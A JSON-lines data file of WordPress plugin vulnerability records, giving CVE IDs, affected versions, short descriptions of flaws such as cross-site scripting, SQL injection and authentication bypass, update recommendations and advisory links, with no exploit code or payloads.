{"CVE_ID":"CVE-2022-4661","slug":"woo-products-widgets-for-elementor","versionEndExcluding":"1.0.8","description":"The Widgets for WooCommerce Products on Elementor WordPress plugin before 1.0.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95956c9-40e5-47aa-86f6-e2da61b3c19f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95956c9-40e5-47aa-86f6-e2da61b3c19f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11896","slug":"ai-content","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The Text Prompter \u2013 Unlimited chatgpt text prompts for openai tasks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'text_prompter' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212197%40ai-content&new=3212197%40ai-content&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212197%40ai-content&new=3212197%40ai-content&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/165f988d-ec6d-44f7-8884-23aedc2fcb08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/165f988d-ec6d-44f7-8884-23aedc2fcb08?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12423","slug":"cf7-redirect-thank-you-page","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The Contact Form 7 Redirect & Thank You Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-redirect-thank-you-page\\\/tags\\\/1.0.7\\\/includes\\\/admin\\\/tabs_page.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-redirect-thank-you-page\\\/tags\\\/1.0.7\\\/includes\\\/admin\\\/tabs_page.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3220810%40cf7-redirect-thank-you-page&new=3220810%40cf7-redirect-thank-you-page&sfp_email=&sfph_mail=#file19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3220810%40cf7-redirect-thank-you-page&new=3220810%40cf7-redirect-thank-you-page&sfp_email=&sfph_mail=#file19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d67965c-f8f3-4868-a261-81cfc80dbcb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d67965c-f8f3-4868-a261-81cfc80dbcb3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5599","slug":"fileorganizer","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The FileOrganizer \u2013 Manage WordPress and Website Files plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.7 via the 'fileorganizer_ajax_handler' function. This makes it possible for unauthenticated attackers to extract sensitive data including backups or other sensitive information if the files have been moved to the built-in Trash folder.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e7b65d-91f8-477e-b992-3148c1b65d7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e7b65d-91f8-477e-b992-3148c1b65d7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/ajax.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/ajax.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098763\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098763\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5204","slug":"swiss-toolkit-for-wp","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The Swiss Toolkit For WP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.7. This is due to the plugin storing custom data in post metadata without an underscore prefix. This makes it possible for authenticated attackers with contributor-level and above permissions to log in as any existing user on the site, such as an administrator.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8526106-847a-420f-9275-f759a8dd4dfb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8526106-847a-420f-9275-f759a8dd4dfb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swiss-toolkit-for-wp\\\/trunk\\\/includes\\\/plugins\\\/class-boomdevs-swiss-toolkit-generate-login-url.php?rev=3077000#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swiss-toolkit-for-wp\\\/trunk\\\/includes\\\/plugins\\\/class-boomdevs-swiss-toolkit-generate-login-url.php?rev=3077000#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091913\\\/swiss-toolkit-for-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091913\\\/swiss-toolkit-for-wp\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3720","slug":"upload-media-by-url","versionEndExcluding":"1.0.8","description":"The Upload Media By URL WordPress plugin before 1.0.8 does not have CSRF check when uploading files, which could allow attackers to make logged in admins upload files (including HTML containing JS code for users with the unfiltered_html capability) on their behalf.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16375a7f-0a9f-4961-8510-d047ffbf3954\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16375a7f-0a9f-4961-8510-d047ffbf3954\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3102","slug":"suretriggers","versionImpact":"1.0.78","versionEndExcluding":"1.0.79","description":"The SureTriggers: All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the 'secret_key' value in the 'autheticate_user' function in all versions up to, and including, 1.0.78. This makes it possible for unauthenticated attackers to create administrator accounts on the target website when the plugin is installed and activated but not configured with an API key.","recommendation":"Update to version 1.0.79, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/suretriggers\\\/trunk\\\/src\\\/Controllers\\\/RestController.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/suretriggers\\\/trunk\\\/src\\\/Controllers\\\/RestController.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3266499%40suretriggers%2Ftrunk&old=3264905%40suretriggers%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3266499%40suretriggers%2Ftrunk&old=3264905%40suretriggers%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec017311-f150-4a14-a4b4-b5634f574e2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec017311-f150-4a14-a4b4-b5634f574e2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8854","slug":"cp-polls","versionImpact":"1.0.76","versionEndExcluding":"1.0.77","description":"The Polls CP WordPress plugin before 1.0.77 does not sanitise and escape some of its poll settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multi site setup).","recommendation":"Update to version 1.0.77, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bffe0f75-33a2-4270-af13-835b8eb65688\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bffe0f75-33a2-4270-af13-835b8eb65688\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8851","slug":"cp-polls","versionImpact":"1.0.76","versionEndExcluding":"1.0.77","description":"The Polls CP WordPress plugin before 1.0.77 does not sanitise and escape some of its poll settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multi site setup).","recommendation":"Update to version 1.0.77, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/493f3360-3155-4105-9b5c-60a8605275ab\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/493f3360-3155-4105-9b5c-60a8605275ab\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6219","slug":"bookingpress-appointment-booking","versionEndExcluding":"1.0.77","description":"The BookingPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'bookingpress_process_upload' function in versions up to, and including, 1.0.76. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/710b8e4e-01de-4e99-8cf2-31abc2419b29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/710b8e4e-01de-4e99-8cf2-31abc2419b29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/tags\\\/1.0.76\\\/core\\\/classes\\\/class.bookingpress_fileupload_class.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/tags\\\/1.0.76\\\/core\\\/classes\\\/class.bookingpress_fileupload_class.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3001484\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3001484\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3001484\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_fileupload_class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3001484\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_fileupload_class.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0037","slug":"wd-google-maps","versionEndExcluding":"1.0.73","description":"The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33ab1fe2-6611-4f43-91ba-52c56f02ed56\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33ab1fe2-6611-4f43-91ba-52c56f02ed56\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/wd-google-maps_1-0-72_1\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/wd-google-maps_1-0-72_1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4758","slug":"wd-google-maps","versionEndExcluding":"1.0.72","description":"The 10WebMapBuilder WordPress plugin before 1.0.72 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2c89234-5e9c-47c8-9827-8ab0b10fb7d6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2c89234-5e9c-47c8-9827-8ab0b10fb7d6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46152","slug":"bulk-editor","versionImpact":"1.0.7.1","versionEndExcluding":"1.0.7.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin <=\u00a01.0.7.1 versions.","recommendation":"Update to version 1.0.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-plugin-1-0-7-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-plugin-1-0-7-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-44990","slug":"bulk-editor","versionImpact":"1.0.7.1","versionEndExcluding":"1.0.7.2","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin <=\u00a01.0.7.1 versions.","recommendation":"Update to version 1.0.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-plugin-1-0-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-plugin-1-0-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34028","slug":"bulk-editor","versionEndExcluding":"1.0.7.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin <=\u00a01.0.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22139","slug":"wp-manutencao","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"Authentication Bypass by Spoofing vulnerability in Filipe Seabra WordPress Manuten\u00e7\u00e3o allows Functionality Bypass.This issue affects WordPress Manuten\u00e7\u00e3o: from n\/a through 1.0.6.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-manutencao\\\/wordpress-wordpress-manutencao-plugin-1-0-6-bypass-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-manutencao\\\/wordpress-wordpress-manutencao-plugin-1-0-6-bypass-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12177","slug":"ai-image-alt-text-generator-for-wp","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Ai Image Alt Text Generator for WP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-image-alt-text-generator-for-wp\\\/tags\\\/1.0.2\\\/includes\\\/class-boomdevs-ai-image-alt-text-generator-custom-menu.php#L218\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-image-alt-text-generator-for-wp\\\/tags\\\/1.0.2\\\/includes\\\/class-boomdevs-ai-image-alt-text-generator-custom-menu.php#L218\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/902ec583-c072-4c6d-8250-ad08d7ecf239?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/902ec583-c072-4c6d-8250-ad08d7ecf239?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10685","slug":"cf7-redirect-thank-you-page","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Contact Form 7 Redirect & Thank You Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f52285e0-e78d-4231-8ff9-53fbe568fcc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f52285e0-e78d-4231-8ff9-53fbe568fcc2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3184638%40cf7-redirect-thank-you-page&new=3184638%40cf7-redirect-thank-you-page&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3184638%40cf7-redirect-thank-you-page&new=3184638%40cf7-redirect-thank-you-page&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11760","slug":"currency-converter-widget-pro","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Currency Converter Widget ? PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'currency-converter-widget-pro' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206549%40currency-converter-widget-pro&new=3206549%40currency-converter-widget-pro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206549%40currency-converter-widget-pro&new=3206549%40currency-converter-widget-pro&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f9a0341-5479-4b83-8ce8-eb838a34a448?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f9a0341-5479-4b83-8ce8-eb838a34a448?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2324","slug":"fileorganizer","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The FileOrganizer \u2013 Manage WordPress and Website Files plugin for WordPress is vulnerable to Stored Cross-Site Scripting via svg file upload in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. For the free version, this is limited to administrators. The pro version is also vulnerable and exploitable by administrators, but also offers the functionality to lower level users (as low as subscribers) if enabled.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffaefd79-57a7-43b8-af1c-e108567eba67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffaefd79-57a7-43b8-af1c-e108567eba67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069064%40fileorganizer%2Ftrunk&old=3010587%40fileorganizer%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069064%40fileorganizer%2Ftrunk&old=3010587%40fileorganizer%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25212","slug":"wp-responsive-video-gallery-with-lightbox","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The video carousel slider with lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-video-gallery-with-lightbox\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-video-gallery-with-lightbox\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.6&new_path=\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.7&sfp_email=&sfph_mail=#file41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.6&new_path=\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.7&sfp_email=&sfph_mail=#file41\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11763","slug":"plezi","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Plezi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'plezi' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plezi\\\/trunk\\\/includes\\\/plz-admin.php#L590\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/plezi\\\/trunk\\\/includes\\\/plz-admin.php#L590\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67768957-45be-48d9-ad5e-147290ef4cd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67768957-45be-48d9-ad5e-147290ef4cd5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11754","slug":"booking-system-trafft","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Booking System Trafft plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'trafftbooking' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207016%40booking-system-trafft&new=3207016%40booking-system-trafft&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207016%40booking-system-trafft&new=3207016%40booking-system-trafft&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84adbde0-9a9b-4a76-9333-56880fcc139d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84adbde0-9a9b-4a76-9333-56880fcc139d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1514","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.7","versionEndExcluding":"1.0.6.8","description":"The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to unauthorized filter calling due to insufficient restrictions on the get_smth() function in all versions up to, and including, 1.0.6.7. This makes it possible for unauthenticated attackers to call arbitrary WordPress filters with a single parameter.","recommendation":"Update to version 1.0.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1753\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1753\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257043%40profit-products-tables-for-woocommerce&new=3257043%40profit-products-tables-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257043%40profit-products-tables-for-woocommerce&new=3257043%40profit-products-tables-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6edf91de-9553-4aa1-a29f-89771c8e852e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6edf91de-9553-4aa1-a29f-89771c8e852e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
